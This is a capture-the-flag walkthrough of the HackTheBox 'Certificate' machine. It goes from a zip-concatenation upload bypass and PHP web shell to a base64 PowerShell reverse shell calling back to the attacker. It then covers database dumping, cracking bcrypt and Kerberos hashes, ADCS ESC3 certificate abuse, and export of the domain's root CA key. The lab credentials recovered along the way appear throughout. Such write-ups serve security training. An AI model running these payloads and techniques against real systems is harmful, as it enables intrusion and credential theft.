Here is my note on CERTIFICATE from Hackthebox.
CERTIFICATE: 10.129.200.104
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.0.30)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
|_http-title: Did not follow redirect to http://certificate.htb/
sudo nikto -C all -h=http://certificate.htb/ -o nikto.txt
Nothing interesting about it
ffuf -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://certificate.htb/FUZZ
#Nothing interesting so maybe try dirsearch instead.
dirsearch -u http://certificate.htb/
#Nothing interesting.
ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://certificate.htb/ -H "Host: FUZZ.certificate.htb"
#NO VHOST
Register an account as usual.
"Please note that after creating a teacher account you need to contact ours support to verify your identity and activate your account"
Did create an account qwop as a teacher and it leads completely a white page after logging in.
Teacher account = DISABLED need to contact a support.
Student Account = works just fine.
Contact page:
support@certificate.htb
Send us your query anytime!
#No hidden links stuff like that to capture a request to do XSS attacks.
#MOVE ON.
Let's go back to student account and enroll some courses.
Go to any assignment, submit, quiz and exam sections.
It allow to upload a file.
http://certificate.htb/upload.php?s_id=8
Please select the assignment file you want to upload (the file will be reviewed by the course instructor)
We accept only the following file types: .pdf .docx .pptx .xlsx
You include the assignment file in .zip archive file to reduce it's size
Let's see if we can steal ntlm hash out of it.
I guess not.
But can we upload a php file though ?
400 bad request.
The request you sent contains bad or malicious content(Invalid MIME type).
File Upload Bypass ?
Change MIME type = application/pdf
shell.pdf.php
400 Bad Request
The request you sent contains bad or malicious content(Invalid Extension).
File Upload Bypass didn't work but we can do ZIP SLIP instead.
ZIP SLIP File Upload Exploitation NOTES:
This vulnerability involves uploading a malicious ZIP archive containing path traversal sequences (like ../../) to overwrite sensitive files on the server during extraction.
https://medium.com/@ibm_ptc_security/zip-slip-attack-e3e63a13413f
Preparing the Malicious ZIP:
1. Create a benign zip with a regular PDF file:
zip benign.zip legit.pdf
2. Create a reverse shell payload:
mkdir malicious_files
cd malicious_files
nano shell.php
<?php $out=shell_exec($_REQUEST['cmd']); echo "<pre>$out</pre>"; ?>"
3. Package the malicious payload:
zip -r malicious.zip malicious_files/
4. Combine both ZIPs into a single archive:
cat benign.zip malicious.zip > combined.zip
This combined.zip file contains both a harmless PDF and the malicious PHP reverse shell. The idea is to trick the server into extracting the payload and placing it into a web-accessible location.
56: Exploiting the Upload Function
Upload the newzip.zip at:
http://certificate.htb/upload.php?s_id=36
After uploading, you’ll see a "CLICK HERE" link. Click it to navigate to the extracted file path.
Now, manually change the URL's end segment to shell.php, like this:
http://certificate.htb/extracted-path/yourfoldername/shell.php
Once accessed, this triggers the web shell.
It's seems webshell didn't run very well so I decided to to verify.
http://certificate.htb/static/uploads/2ab9246c52ae5cd50a88a4d867008fbf/malicious_files/test.txt
Hello World
#It seems I can upload any files whatever I want here.
Looks like php web shell didn't works very well ?
Maybe try the windows version of it ?
<?php $out=shell_exec($_REQUEST['cmd']); echo "<pre>$out</pre>"; ?>"
#WORKS !
http://certificate.htb/static/uploads/2ab9246c52ae5cd50a88a4d867008fbf/malicious_files/shell.php?cmd=whoami
http://certificate.htb/static/uploads/2ab9246c52ae5cd50a88a4d867008fbf/malicious_files/shell.php?cmd=dir
We going to do the same with netcat this time.
┌──(root㉿kali)-[/home/kali/BOXES/CERTIFICATE/10.129.200.104]
└─# zip -r malicious.zip malicious_files/
adding: malicious_files/ (stored 0%)
adding: malicious_files/shell.php (deflated 4%)
adding: malicious_files/ncat.exe (deflated 59%)
┌──(root㉿kali)-[/home/kali/BOXES/CERTIFICATE/10.129.200.104]
└─# cat benign.zip malicious.zip > combined.zip
Nevermind no netcat then lol !
revshells.com as usual.
revshells payload
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQAzADUAIgAsADEAMgAzADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA
http://certificate.htb/static/uploads/2ab9246c52ae5cd50a88a4d867008fbf/malicious_files/shell.php?cmd=powershell -e [BASE64 Payload]
sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.135] from (UNKNOWN) [10.129.200.104] 58497
whoami
certificate\xamppuser
PS C:\xampp\htdocs\certificate.htb\static\uploads\2ab9246c52ae5cd50a88a4d867008fbf\malicious_files>
REVERSE-SHELL !
PRIV ESC:
xamppuser -> Sara.B
PS C:\xampp\htdocs\certificate.htb> dir
Directory: C:\xampp\htdocs\certificate.htb
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/26/2024 1:49 AM static
-a---- 12/24/2024 12:45 AM 7179 about.php
-a---- 12/30/2024 1:50 PM 17197 blog.php
-a---- 12/30/2024 2:02 PM 6560 contacts.php
-a---- 12/24/2024 6:10 AM 15381 course-details.php
-a---- 12/24/2024 12:53 AM 4632 courses.php
-a---- 12/23/2024 4:46 AM 549 db.php
-a---- 12/22/2024 10:07 AM 1647 feature-area-2.php
-a---- 12/22/2024 10:22 AM 1331 feature-area.php
-a---- 12/22/2024 10:16 AM 2955 footer.php
-a---- 12/23/2024 5:13 AM 2351 header.php
-a---- 12/24/2024 12:52 AM 9497 index.php
-a---- 12/25/2024 1:34 PM 5908 login.php
-a---- 12/23/2024 5:14 AM 153 logout.php
-a---- 12/24/2024 1:27 AM 5321 popular-courses-area.php
-a---- 12/25/2024 1:27 PM 8240 register.php
-a---- 12/28/2024 11:26 PM 10366 upload.php
PS C:\xampp\htdocs\certificate.htb> type db.php
<?php
// Database connection using PDO
try {
$dsn = 'mysql:host=localhost;dbname=Certificate_WEBAPP_DB;charset=utf8mb4';
$db_user = 'certificate_webapp_user'; // Change to your DB username
$db_passwd = 'cert!f!c@teDBPWD'; // Change to your DB password
$options = [
PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
];
$pdo = new PDO($dsn, $db_user, $db_passwd, $options);
} catch (PDOException $e) {
die('Database connection failed: ' . $e->getMessage());
}
?>
C:\\xampp\\mysql\\bin\\mysqldump.exe -u certificate_webapp_user -pcert!f!c@teDBPWD Certificate_WEBAPP_DB > C:\\xampp\\htdocs\\certificate.htb\\static\\full_dump.sql
Download it in Kali:
wget http://certificate.htb/static/full_dump.sql -O full_dump.sql
--2025-08-27 12:47:47-- http://certificate.htb/static/full_dump.sql
Resolving certificate.htb (certificate.htb)... 10.129.200.104
Connecting to certificate.htb (certificate.htb)|10.129.200.104|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 39366 (38K) [application/x-sql]
Saving to: ‘full_dump.sql’
full_dump.sql 100%[===========================================================================>] 38.44K --.-KB/s in 0.04s
2025-08-27 12:47:47 (1.03 MB/s) - ‘full_dump.sql’ saved [39366/39366]
cat full_dump.sql
[SNIP]
INSERT INTO `users` VALUES (1,'Lorra','Armessa','Lorra.AAA','lorra.aaa@certificate.htb','$2y$04$bZs2FUjVRiFswY84CUR8ve02ymuiy0QD23XOKFuT6IM2sBbgQvEFG','202
4-12-23 20:43:10','teacher',1),(6,'Sara','Laracrof','Sara1200','sara1200@gmail.com','$2y$04$pgTOAkSnYMQoILmL6MRXLOOfFlZUPR4lAD2kvWZj.i/dyvXNSqCkK','2024-12
-23 20:47:11','teacher',1),(7,'John','Wood','Johney','johny009@mail.com','$2y$04$VaUEcSd6p5NnpgwnHyh8zey13zo/hL7jfQd9U.PGyEW3yqBf.IxRq','2024-12-23 21:18:1
8','student',1),(8,'Havok','Watterson','havokww','havokww@hotmail.com','$2y$04$XSXoFSfcMoS5Zp8ojTeUSOj6ENEun6oWM93mvRQgvaBufba5I5nti','2024-12-24 17:08:04'
,'teacher',1),(9,'Steven','Roman','stev','steven@yahoo.com','$2y$04$6FHP.7xTHRGYRI9kRIo7deUHz0LX.vx2ixwv0cOW6TDtRGgOhRFX2','2024-12-24 20:05:05','student',
1),(10,'Sara','Brawn','sara.b','sara.b@certificate.htb','$2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6','2024-12-26 05:31:26','admin',1),(12
,'qwop','qwop','qwop','qwop@qwop.com','$2y$04$n552Je6YNEVQ4eWA512RHu3K09iWHcpJJ8seIQPGTNfYo2rMrHfPy','2025-08-27 23:03:50','teacher',0),(14,'qwop2','qwop2'
,'qwop2','qwop2@qwop.com','$2y$04$k3MvRxHzmNxZkZUeyHUBH.KRayCAryEZwm4nMX1QyUdTrfFbvCIUa','2025-08-27 23:11:08','student',1),(15,'qwop3','qwop3','qwop3','qw
op3@qwop.com','$2y$04$LOu1JeL61ZiNvJIzz8W0feuT1rEWYThcmWwujOVpGInCfNm2leqa2','2025-08-27 23:15:16','teacher',0);
lorra.aaa:$2y$04$bZs2FUjVRiFswY84CUR8ve02ymuiy0QD23XOKFuT6IM2sBbgQvEFG
sara1200:$2y$04$pgTOAkSnYMQoILmL6MRXLOOfFlZUPR4lAD2kvWZj.i/dyvXNSqCkK
johny009:$2y$04$VaUEcSd6p5NnpgwnHyh8zey13zo/hL7jfQd9U.PGyEW3yqBf.IxRq
havokww:$2y$04$XSXoFSfcMoS5Zp8ojTeUSOj6ENEun6oWM93mvRQgvaBufba5I5nti
steven:$2y$04$6FHP.7xTHRGYRI9kRIo7deUHz0LX.vx2ixwv0cOW6TDtRGgOhRFX2
sara.b:$2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6
┌──(root㉿kali)-[/home/kali/BOXES/CERTIFICATE/10.129.200.104]
└─# cat hash.txt
lorra.aaa:$2y$04$bZs2FUjVRiFswY84CUR8ve02ymuiy0QD23XOKFuT6IM2sBbgQvEFG
sara1200:$2y$04$pgTOAkSnYMQoILmL6MRXLOOfFlZUPR4lAD2kvWZj.i/dyvXNSqCkK
johny009:$2y$04$VaUEcSd6p5NnpgwnHyh8zey13zo/hL7jfQd9U.PGyEW3yqBf.IxRq
havokww:$2y$04$XSXoFSfcMoS5Zp8ojTeUSOj6ENEun6oWM93mvRQgvaBufba5I5nti
steven:$2y$04$6FHP.7xTHRGYRI9kRIo7deUHz0LX.vx2ixwv0cOW6TDtRGgOhRFX2
sara.b:$2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6
┌──(root㉿kali)-[/home/kali/BOXES/CERTIFICATE/10.129.200.104]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 6 password hashes with 6 different salts (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Blink182 (sara.b)
┌──(root㉿kali)-[/home/kali/BOXES/CERTIFICATE/10.129.200.104]
└─# crackmapexec smb 10.129.200.104 -u sara.b -p Blink182
SMB 10.129.200.104 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:certificate.htb) (signing:True) (SMBv1:False)
SMB 10.129.200.104 445 DC01 [+] certificate.htb\sara.b:Blink182
┌──(root㉿kali)-[/home/kali/BOXES/CERTIFICATE/10.129.200.104]
└─# crackmapexec winrm 10.129.200.104 -u sara.b -p Blink182
SMB 10.129.200.104 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:certificate.htb)
HTTP 10.129.200.104 5985 DC01 [*] http://10.129.200.104:5985/wsman
WINRM 10.129.200.104 5985 DC01 [+] certificate.htb\sara.b:Blink182 (Pwn3d!)
Sara.B -> Lion.SK:
evil-winrm -i 10.129.200.104 -u sara.b -p Blink182
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Sara.B\Documents> whoami
certificate\sara.b
*Evil-WinRM* PS C:\Users\Sara.B\Documents> hostname
DC01
*Evil-WinRM* PS C:\Users\Sara.B\Documents\WS-01> dir
Directory: C:\Users\Sara.B\Documents\WS-01
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/4/2024 12:44 AM 530 Description.txt
-a---- 11/4/2024 12:45 AM 296660 WS-01_PktMon.pcap
*Evil-WinRM* PS C:\Users\Sara.B\Documents\WS-01> type Description.txt
The workstation 01 is not able to open the "Reports" smb shared folder which is hosted on DC01.
When a user tries to input bad credentials, it returns bad credentials error.
But when a user provides valid credentials the file explorer freezes and then crashes!
*Evil-WinRM* PS C:\Users\Sara.B\Documents\WS-01> downloads WS-01_PktMon.pcap
Info: Downloading C:\Users\Sara.B\Documents\WS-01\WS-01_PktMon.pcap to WS-01_PktMon.pcap
Info: Download successful!
Extracting Kerberos Credentials from PCAP:
WS-01_PktMon.pcap contains the kerberos key that we can crack within it.
https://www.netresec.com/?page=Blog&month=2019-11&post=Extracting-Kerberos-Credentials-from-PCAP
https://notes.benheater.com/books/active-directory/page/extracting-secrets-from-pcaps
https://securityboulevard.com/2019/11/extracting-kerberos-credentials-from-pcap/
https://github.com/jalvarezz13/Krb5RoastParser
https://phyothuraoo.substack.com/p/easy-guide-to-as-rep-roasting-and
┌──(root㉿kali)-[/home/kali/Kali-Tools/Krb5RoastParser]
└─# ls
krb5_roast_parser.py LICENSE README.md WS-01_PktMon.pcap
┌──(root㉿kali)-[/home/kali/Kali-Tools/Krb5RoastParser]
└─# python3 krb5_roast_parser.py WS-01_PktMon.pcap as_req >>hash.txt
┌──(root㉿kali)-[/home/kali/Kali-Tools/Krb5RoastParser]
└─# cat hash.txt
$krb5pa$18$Lion.SK$CERTIFICATE.HTB$23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0
hashcat -m 19900 hash.txt /usr/share/wordlists/rockyou.txt
$krb5pa$18$Lion.SK$CERTIFICATE.HTB$23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0:!QAZ2wsx
Lion.SK:!QAZ2wsx
┌──(root㉿kali)-[/home/kali/BOXES/CERTIFICATE/10.129.200.104]
└─# crackmapexec winrm 10.129.200.104 -u Lion.SK -p '!QAZ2wsx'
SMB 10.129.200.104 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:certificate.htb)
HTTP 10.129.200.104 5985 DC01 [*] http://10.129.200.104:5985/wsman
WINRM 10.129.200.104 5985 DC01 [+] certificate.htb\Lion.SK:!QAZ2wsx (Pwn3d!)
Lion.SK SHELL !
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-27 02:41:53Z)
bloodhound-python -c all --disable-pooling -w 1 -u sara.b -p 'Blink182' -d certificate.htb -dc dc01.certificate.htb -ns 10.129.200.104 --dns-tcp --zip --dns-timeout 120
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-08-27T02:42:55+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after: 2025-11-04T03:14:54
ldapsearch -x -H ldap://10.129.200.104 -D '' -w '' -b "DC=certificate,DC=htb"
ldapv3 = need an account.
445/tcp open microsoft-ds?
smbclient -N -L 10.129.200.104
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.200.104 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after: 2025-11-04T03:14:54
|_ssl-date: 2025-08-27T02:42:55+00:00; +8h00m00s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after: 2025-11-04T03:14:54
|_ssl-date: 2025-08-27T02:42:55+00:00; +8h00m00s from scanner time.
3269/tcp open globalcatLDAPssl?
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after: 2025-11-04T03:14:54
|_ssl-date: 2025-08-27T02:42:55+00:00; +8h00m00s from scanner time.
5985/tcp open wsman
evil-winrm -i 10.129.200.104 -u Lion.SK -p '!QAZ2wsx'
*Evil-WinRM* PS C:\Users\Lion.SK\Desktop> whoami
certificate\lion.sk
*Evil-WinRM* PS C:\Users\Lion.SK\Desktop> hostname
DC01
*Evil-WinRM* PS C:\Users\Lion.SK\Desktop> dir
Directory: C:\Users\Lion.SK\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 8/26/2025 7:38 PM 34 user.txt
*Evil-WinRM* PS C:\Users\Lion.SK\Desktop> type user.txt
[REDIRECTED]
USER.TXT: [REDIRECTED]
PRIV ESC:
Lion.SK -> Ryan.K
certipy find -vulnerable -stdout -u Lion.SK@certificate.htb -p '!QAZ2wsx' -dc-ip 10.129.200.104
[*] Trying to get CA configuration for 'Certificate-LTD-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'Certificate-LTD-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : Certificate-LTD-CA
DNS Name : DC01.certificate.htb
Certificate Subject : CN=Certificate-LTD-CA, DC=certificate, DC=htb
Certificate Serial Number : 75B2F4BBF31F108945147B466131BDCA
Certificate Validity Start : 2024-11-03 22:55:09+00:00
Certificate Validity End : 2034-11-03 23:05:09+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : CERTIFICATE.HTB\Administrators
Access Rights
ManageCertificates : CERTIFICATE.HTB\Administrators
CERTIFICATE.HTB\Domain Admins
CERTIFICATE.HTB\Enterprise Admins
ManageCa : CERTIFICATE.HTB\Administrators
CERTIFICATE.HTB\Domain Admins
CERTIFICATE.HTB\Enterprise Admins
Enroll : CERTIFICATE.HTB\Authenticated Users
Certificate Templates
0
Template Name : Delegated-CRA
Display Name : Delegated-CRA
Certificate Authorities : Certificate-LTD-CA
Enabled : True
Client Authentication : False
Enrollment Agent : True
Any Purpose : False
[!] Vulnerabilities
ESC3 : 'CERTIFICATE.HTB\\Domain CRA Managers' can enroll and template has Certificate Request Agent EKU set
certipy req \
-u 'Lion.SK@certificate.htb' -p '!QAZ2wsx' \
-dc-ip '10.129.200.104' -target 'DC01.certificate.htb' \
-ca 'Certificate-LTD-CA' -template 'Delegated-CRA'
┌──(certipy-venv)─(root㉿kali)-[/home/…/BOXES/CERTIFICATE/10.129.200.104/BLOOD]
└─# certipy req \
-u 'Lion.SK@certificate.htb' -p '!QAZ2wsx' \
-dc-ip '10.129.200.104' -target 'DC01.certificate.htb' \
-ca 'Certificate-LTD-CA' -template 'Delegated-CRA'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 22
[*] Got certificate with UPN 'Lion.SK@certificate.htb'
[*] Certificate object SID is 'S-1-5-21-515537669-4223687196-3249690583-1115'
[*] Saved certificate and private key to 'lion.sk.pfx'
certipy req \
-u 'Lion.SK@certificate.htb' -p '!QAZ2wsx' \
-dc-ip '10.129.200.104' -target 'DC01.certificate.htb' \
-ca 'Certificate-LTD-CA' -template 'SignedUser' \
-pfx 'lion.sk.pfx' -on-behalf-of 'certificate\ryan.k'
┌──(certipy-venv)─(root㉿kali)-[/home/…/BOXES/CERTIFICATE/10.129.200.104/BLOOD]
└─# certipy req \
-u 'Lion.SK@certificate.htb' -p '!QAZ2wsx' \
-dc-ip '10.129.200.104' -target 'DC01.certificate.htb' \
-ca 'Certificate-LTD-CA' -template 'SignedUser' \
-pfx 'lion.sk.pfx' -on-behalf-of 'certificate\ryan.k'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 28
[*] Got certificate with UPN 'ryan.k@certificate.htb'
[*] Certificate object SID is 'S-1-5-21-515537669-4223687196-3249690583-1117'
[*] Saved certificate and private key to 'ryan.k.pfx'
certipy auth -pfx 'ryan.k.pfx' -dc-ip '10.129.200.104'
┌──(certipy-venv)─(root㉿kali)-[/home/…/BOXES/CERTIFICATE/10.129.200.104/BLOOD]
└─# faketime -f $(ntpdate -q certificate.htb | awk '{print $4}') bash
┌──(certipy-venv)(root㉿kali)-[/home/kali/BOXES/CERTIFICATE/10.129.200.104/BLOOD]
└─# certipy auth -pfx 'ryan.k.pfx' -dc-ip '10.129.200.104'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: ryan.k@certificate.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ryan.k.ccache'
[*] Trying to retrieve NT hash for 'ryan.k'
[*] Got hash for 'ryan.k@certificate.htb': aad3b435b51404eeaad3b435b51404ee:b1bc3d70e70f4f36b1509a65ae1a2ae6
┌──(certipy-venv)─(root㉿kali)-[/home/…/BOXES/CERTIFICATE/10.129.200.104/BLOOD]
└─# crackmapexec winrm 10.129.200.104 -u ryan.k -H 'b1bc3d70e70f4f36b1509a65ae1a2ae6'
SMB 10.129.200.104 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:certificate.htb)
HTTP 10.129.200.104 5985 DC01 [*] http://10.129.200.104:5985/wsman
WINRM 10.129.200.104 5985 DC01 [+] certificate.htb\ryan.k:b1bc3d70e70f4f36b1509a65ae1a2ae6 (Pwn3d!)
┌──(root㉿kali)-[/home/kali/BOXES/CERTIFICATE/10.129.200.104]
└─# evil-winrm -i 10.129.200.104 -u Ryan.K -H 'b1bc3d70e70f4f36b1509a65ae1a2ae6'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> whoami
certificate\ryan.k
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> hostname
DC01
https://hackfa.st/Offensive-Security/Windows-Environment/Privilege-Escalation/Token-Impersonation/SeManageVolumePrivilege/
SeManageVolumeExploit + ADCS NOTES:
Ryan.K -> Administrator:
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> whoami
certificate\ryan.k
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> hostname
DC01
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ================================ =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
#It kinda works but we can access any directory whatever we want including administrator folder.
#With this advantage we can enumerate and export private ca key file file.
*Evil-WinRM* PS C:\Users\Ryan.K> certutil -Store My
My "Personal"
================ Certificate 0 ================
Archived!
Serial Number: 472cb6148184a9894f6d4d2587b1b165
Issuer: CN=certificate-DC01-CA, DC=certificate, DC=htb
NotBefore: 11/3/2024 3:30 PM
NotAfter: 11/3/2029 3:40 PM
Subject: CN=certificate-DC01-CA, DC=certificate, DC=htb
CA Version: V0.0
Signature matches Public Key
Root Certificate: Subject matches Issuer
Cert Hash(sha1): 82ad1e0c20a332c8d6adac3e5ea243204b85d3a7
Key Container = certificate-DC01-CA
Provider = Microsoft Software Key Storage Provider
Missing stored keyset
================ Certificate 1 ================
Serial Number: 5800000002ca70ea4e42f218a6000000000002
Issuer: CN=Certificate-LTD-CA, DC=certificate, DC=htb
NotBefore: 11/3/2024 8:14 PM
NotAfter: 11/3/2025 8:14 PM
Subject: CN=DC01.certificate.htb
Certificate Template Name (Certificate Type): DomainController
Non-root Certificate
Template: DomainController, Domain Controller
Cert Hash(sha1): 779a97b1d8e492b5bafebc02338845ffdff76ad2
Key Container = 46f11b4056ad38609b08d1dea6880023_7989b711-2e3f-4107-9aae-fb8df2e3b958
Provider = Microsoft RSA SChannel Cryptographic Provider
Missing stored keyset
================ Certificate 2 ================
Serial Number: 75b2f4bbf31f108945147b466131bdca
Issuer: CN=Certificate-LTD-CA, DC=certificate, DC=htb
NotBefore: 11/3/2024 3:55 PM
NotAfter: 11/3/2034 4:05 PM
Subject: CN=Certificate-LTD-CA, DC=certificate, DC=htb
Certificate Template Name (Certificate Type): CA
CA Version: V0.0
Signature matches Public Key
Root Certificate: Subject matches Issuer
Template: CA, Root Certification Authority
Cert Hash(sha1): 2f02901dcff083ed3dbb6cb0a15bbfee6002b1a8
Key Container = Certificate-LTD-CA
Provider = Microsoft Software Key Storage Provider
Missing stored keyset
CertUtil: -store command completed successfully.
Certificate 2 is the interesting one.
This certificate is passwordless and is self-signed which means this is the root CA of the domain, so we can perform a Golden Ticket attack.
*Evil-WinRM* PS C:\Users\Ryan.K\WER> ./SeManageVolumeExploit.exe
Entries changed: 880
DONE
*Evil-WinRM* PS C:\Users\Ryan.K\WER> cd ..
*Evil-WinRM* PS C:\Users\Ryan.K> certutil -exportPFX My 75b2f4bbf31f108945147b466131bdca cert.pfx
My "Personal"
================ Certificate 2 ================
Serial Number: 75b2f4bbf31f108945147b466131bdca
Issuer: CN=Certificate-LTD-CA, DC=certificate, DC=htb
NotBefore: 11/3/2024 3:55 PM
NotAfter: 11/3/2034 4:05 PM
Subject: CN=Certificate-LTD-CA, DC=certificate, DC=htb
Certificate Template Name (Certificate Type): CA
CA Version: V0.0
Signature matches Public Key
Root Certificate: Subject matches Issuer
Template: CA, Root Certification Authority
Cert Hash(sha1): 2f02901dcff083ed3dbb6cb0a15bbfee6002b1a8
Key Container = Certificate-LTD-CA
Unique container name: 26b68cbdfcd6f5e467996e3f3810f3ca_7989b711-2e3f-4107-9aae-fb8df2e3b958
Provider = Microsoft Software Key Storage Provider
Signature test passed
Enter new password for output file cert.pfx:
Enter new password:
Confirm new password:
CertUtil: -exportPFX command completed successfully.
certutil -exportPFX My 75b2f4bbf31f108945147b466131bdca cert.pfx
